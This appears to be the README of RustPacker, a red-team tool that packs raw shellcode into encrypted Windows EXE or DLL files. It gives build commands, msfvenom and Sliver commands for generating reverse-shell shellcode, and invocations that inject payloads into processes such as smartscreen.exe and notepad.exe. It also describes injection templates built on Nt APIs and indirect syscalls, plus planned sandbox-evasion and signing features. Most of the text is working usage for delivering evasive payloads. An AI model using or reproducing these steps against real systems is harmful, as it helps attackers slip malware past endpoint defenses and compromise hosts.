Yes! Here with the common metasploit calc exec payload on a Windows 11 host, using the ntCRT template and AES. Last test on 21/12/2023.
Consider using Podman instead of Docker for security reasons. From any internet-connected OS with either Podman or Docker installed:
git clone https://github.com/Nariod/RustPacker.gitcd RustPacker/podman build -t rustpacker -f Dockerfile. This operation may take a while.- Paste your shellcode file in the
sharedfolder, and create your first binary targeting a runningsmartscreenprocess: podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/calc.raw -i syscrt -e aes -b exe -t smartscreen.exe- Retrieve the output binary along with the Rust source files in
output_[RANDOM_NAME]:target/x86_64-pc-windows-gnu/release/
For regular use, you can set an alias:
- On Linux host:
alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker' - Then:
rustpacker -f shared/calc.raw -i syscrt -e aes -b exe -t smartscreen.exe
RustPacker is compatible with any raw shellcode.
You can generate raw MSF shellcode using msfvenom's raw format. Ex:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 EXITFUNC=thread -f raw -o msf.bin
You can generate raw Sliver shellcode using Sliver's "--format shellcode". Ex:
generate --mtls 127.0.0.1:443 --format shellcode --os windows --evasion- You can use Shikata Ga Nai (SGN) Sliver encoder if prompted. RustPacker templates now use RWX memory regions (not really OPSEC safe), which are required for SGN to work.
Consider using Podman instead of Docker for security reasons. From any internet-connected OS with either Podman or Docker installed:
git clone https://github.com/Nariod/RustPacker.gitcd RustPacker/podman build -t rustpacker -f Dockerfile- Paste your shellcode file in the
sharedfolder podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe- Retrieve the output binary along with the Rust source files in the
output_RANDOM_NAMEfolder inshared
For regular use, you can set an alias:
- On Linux host:
alias rustpacker='podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker' - Then:
rustpacker -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
Install dependencies:
sudo apt update && sudo apt upgrade -ysudo apt install -y libssl-dev librust-openssl-dev musl-tools mingw-w64 cmake libxml2-dev
Install Rust:
- https://www.rust-lang.org/tools/install
source $HOME/.cargo/envrustup target add x86_64-pc-windows-gnu
Run RustPacker:
git clone https://github.com/Nariod/RustPacker.gitcd RustPacker/cargo run -- -f shared/calc.raw -i ntcrt -e xor -b exe -t smartscreen.exe
For now, you can choose from the following templates:
winCRT, which injects your shellcode in a remote process using the following high-level API calls:OpenProcess,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread. You can supply the target process with-t, defaults todllhost.exeotherwise. Uses the official Windows crates.ntCRT, which injects your shellcode in a remote process using the following low-level API calls:NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx. You can supply the target process with-t, defaults todllhost.exeotherwise.ntAPC, which executes your shellcode in a new process using the following low-levels API calls:NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtQueueApcThread,NtTestAlert.sysCRT, which injects your shellcode in a remote process using indirect syscalls to the following low-level API:NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx. You can supply the target process with-t, defaults todllhost.exeotherwise. Uses the rust-syscalls project for syscalls.
All the templates are compatible with either XOR or AES encryption, and can generate an EXE or a DLL file. Templates that inject in remote processes are compatible with the -t option to target the process of your choice.
If you want to pack your Sliver shellcode using the ntCRT template with AES encryption, target notepad.exe, and retrieve an EXE file:
- Generate your raw shellcode from Sliver
- Copy / paste your shellcode file in the
sharedfolder of the Rustpacker project - Using Podman/Docker without alias:
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/AMAZING_SLIVER.bin -i ntcrt -e aes -b exe -t notepad.exe - Using Podman/Docker with an alias:
rustpacker -f shared/AMAZING_SLIVER.bin -i ntcrt -e aes -b exe -t notepad.exe - Retrieve the output binary along with the Rust source files in the
output_[RANDOM_NAME]:target/x86_64-pc-windows-gnu/release/
If you want to pack your Msfvenom shellcode using the ntAPC template with XOR encryption, and retrieve a DLL file:
- Generate your raw shellcode from Msfvenom
- Copy / paste your shellcode file in the
sharedfolder of the Rustpacker project - Using Podman/Docker without alias:
podman run --rm -v $(pwd)/shared:/usr/src/RustPacker/shared:z rustpacker RustPacker -f shared/msf.bin -i ntapc -e xor -b dll - Using Podman/Docker with an alias:
rustpacker -f shared/msf.bin -i ntapc -e xor -b dll - Retrieve the output binary along with the Rust source files in the
output_[RANDOM_NAME]:target/x86_64-pc-windows-gnu/release/
These templates are no longer available with RustPacker, but can be found in RustPacker/templates/OLD/:
ct, which executes your shellcode by spawning a process using the following API calls:VirtualAlloc, VirtualProtect, CreateThread, WaitForSingleObject.crt, which injects your shellcode in thedllhost.exeprocess using the following API calls:OpenProcess, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, CreateRemoteThread.
If you have some experience with Rust, you're more than welcome to help ! You can help by:
- Reviewing the code for mistakes / improvements
- Opening issues
- Contacting me on Discord for a more in depth review (nariod#4621)
- Port createThread Rust template
- Port createRemoteThread Rust template
- Debug binary file to Vec
- Debug compiler
- Packer POC
- Migrate to "std::include_bytes"
- Add xor
- Add AES
- Add Sliver SGN support
- Refactor code
- Write ntCRT template with Nt APIs
- Rewrite all templates using Nt APIs only
- Build dockerfile
- Strip output binaries
- Add string encryption option with litcrypt or other
- Add option to choose the target process to inject into
- Add sandbox evasion option
- Reduce cargo verbosity
- Generate random name for generated binary
- Add binary signing support
- Port ntCRT to sysCRT with syscalls
- Port ntAPC to sysAPC with syscalls
- Write detailed doc
- Support both EXE and DLL formats
- Add semaphore/mutex support to ensure only one instance of the shellcode is running
- Remove the annoying snake case warnings
- Bump Clap from v3 to v4
- Implement Maldev Academy smart XOR
- memN0ps for all his work
- The rust-syscalls project
- trickster0 for his OffensiveRust repo
- Rust discord
- StackOverflow
- https://github.com/postrequest/link
- craiyon for the Rustpacker logo
Usage of anything presented in this repo to attack targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.